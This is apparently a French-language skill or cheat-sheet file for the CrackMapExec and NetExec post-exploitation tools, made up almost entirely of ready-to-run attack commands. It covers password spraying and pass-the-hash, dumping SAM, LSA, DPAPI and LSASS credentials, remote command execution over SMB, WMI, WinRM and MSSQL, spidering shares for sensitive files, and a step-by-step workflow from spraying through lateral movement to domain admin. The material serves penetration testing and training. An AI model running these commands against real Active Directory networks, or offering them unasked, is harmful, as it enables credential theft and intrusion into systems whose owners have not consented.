| name | crackmapexec-netexec |
| description | CrackMapExec (CME) et NetExec (NXC) — post-exploitation AD, exécution de commandes, pass-the-hash, énumération SMB/WinRM/LDAP/SSH/MSSQL, spraying de mots de passe, extraction SAM/LSA/DPAPI, et modules avancés. |
CrackMapExec & NetExec — Post-Exploitation AD
Présentation
CrackMapExec (CME) est un outil de post-exploitation AD. NetExec (NXC) est son fork moderne (Python 3) avec plus de protocoles.
Installation :
sudo apt install crackmapexec
pipx install git+https://github.com/Pennyw0rth/NetExec
pip3 install netexec
Syntaxe commune
crackmapexec <protocole> <cible> -u <user> -p <pass>
netexec <protocole> <cible> -u <user> -p <pass>
Protocoles supportés
SMB
crackmapexec smb 192.168.1.10 -u admin -p 'Password123'
crackmapexec smb 192.168.1.10 -u admin -H NTHASH
crackmapexec smb -L
crackmapexec smb -M sam --help
WinRM
crackmapexec winrm 192.168.1.10 -u admin -p 'Password123'
crackmapexec winrm 192.168.1.10 -u admin -H NTHASH
LDAP
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123'
SSH
crackmapexec ssh 192.168.1.10 -u root -p 'Password123'
MSSQL
crackmapexec mssql 192.168.1.10 -u sa -p 'Password123'
Modules SMB — Énumération
SAM dump
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sam
crackmapexec smb 192.168.1.10 -u admin -H NTHASH --sam
LSA secrets
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --lsa
DPAPI
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --dpapi
Énumération des partages
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --shares
Sessions actives
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sessions
Disques
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --disks
Modules SMB — Exécution
Execution via SMB (PsExec-like)
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -x whoami
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -x 'ipconfig /all'
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -x 'net user /domain'
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -X whoami
Execution via WMI
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -x whoami --exec-method wmiexec
Execution via atexec (scheduled task)
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -x whoami --exec-method atexec
Password Spraying
Spraying sur SMB
crackmapexec smb 192.168.1.10 -u users.txt -p 'Spring2024!'
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123'
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --continue-on-success
Spraying avec hash
crackmapexec smb 192.168.1.10 -u users.txt -H NTHASH
Spraying multi-cibles
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success
Spraying multi-protocoles
for proto in smb winrm ldap; do
crackmapexec $proto 192.168.1.10 -u users.txt -p 'Password123'
done
Rate limiting (éviter de bloquer les comptes)
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --delay 5
Cible multiple et plages
Plages d'IPs
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123'
crackmapexec smb 192.168.1.10-20 -u admin -p 'Password123'
crackmapexec smb targets.txt -u admin -p 'Password123'
Exclusion
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123' --exclude 192.168.1.1,192.168.1.254
Modules avancés
Lister les modules
crackmapexec smb -L
crackmapexec ldap -L
Module : spider_plus
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' \
-M spider_plus -o DOWNLOAD=true OUTPUT_FOLDER=/tmp/cme_output
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' \
-M spider_plus -o READ_ONLY=true
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' \
-M spider_plus -o PATTERN='xls,xlsx,doc,docx,pdf,kdbx'
Module : lsassy
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M lsassy
Module : handlekatz
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M handlekatz
Module : nanodump
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M nanodump
Module : slinky
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M slinky -o NAME=exploit SHARE=C$
Module : uac
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M uac
Module : wmi
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M wmi -o COMMAND=whoami
LDAP modules
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --users
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --groups
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --trusts
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --password-policy
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --admin-count
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' \
--query "(objectCategory=computer)" --attributes dNSHostName,operatingSystem
MSSQL modules
crackmapexec mssql 192.168.1.10 -u sa -p 'Password123' -q 'SELECT @@version'
crackmapexec mssql 192.168.1.10 -u sa -p 'Password123' -x whoami
crackmapexec mssql 192.168.1.10 -u sa -p 'Password123' --linked-servers
WinRM modules
crackmapexec winrm 192.168.1.10 -u admin -p 'Password123'
crackmapexec winrm 192.168.1.10 -u admin -p 'Password123' -x whoami
Workflow typique d'attaque
1. Password Spraying
crackmapexec smb 192.168.1.10 -u users.txt -p 'Winter2024!'
2. Énumération du poste compromis
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --shares
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sessions
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sam
3. Mouvement latéral
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123'
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTHASH
4. Dump des credentials
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sam
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M lsassy
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --lsa
5. Élévation vers DA
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sessions
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M lsassy
Formatage de sortie
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --shares \
--col "hostname,share,remark"
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --shares --json
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --shares \
--log cme_output.log
CME/NXC vs autres outils
| Outil | Usage | CME/NXC équivalent |
|---|
| PsExec | Exécution commande | -x |
| WMIExec | Exécution via WMI | --exec-method wmiexec |
| Secretsdump | Dump SAM/LSA | --sam --lsa |
| Mimikatz | Dump lsass | -M lsassy |
| BloodHound | Collecte AD | --users --groups |
| SMBClient | List shares | --shares |
| LDAPDomainDump | Dump LDAP | LDAP modules |
Dépannage
| Problème | Solution |
|---|
| "STATUS_LOGON_FAILURE" | Mauvais credentials |
| "STATUS_ACCESS_DENIED" | Pas admin |
| "STATUS_PASSWORD_EXPIRED" | Mot de passe expiré |
| "STATUS_ACCOUNT_LOCKED" | Compte bloqué |
| "SMB signing required" | SMB Signing requis |
| Connexion lente | Vérifier le réseau |
Antisèche rapide
crackmapexec smb 192.168.1.10 -u admin -p 'Password123'
crackmapexec smb 192.168.1.10 -u admin -H NTHASH
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sam
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --lsa
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -x whoami
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --shares
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' --sessions
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --continue-on-success
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M spider_plus
crackmapexec smb 192.168.1.10 -u admin -p 'Password123' -M lsassy
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --users
crackmapexec ldap 192.168.1.10 -u admin -p 'Password123' --password-policy
crackmapexec winrm 192.168.1.10 -u admin -p 'Password123'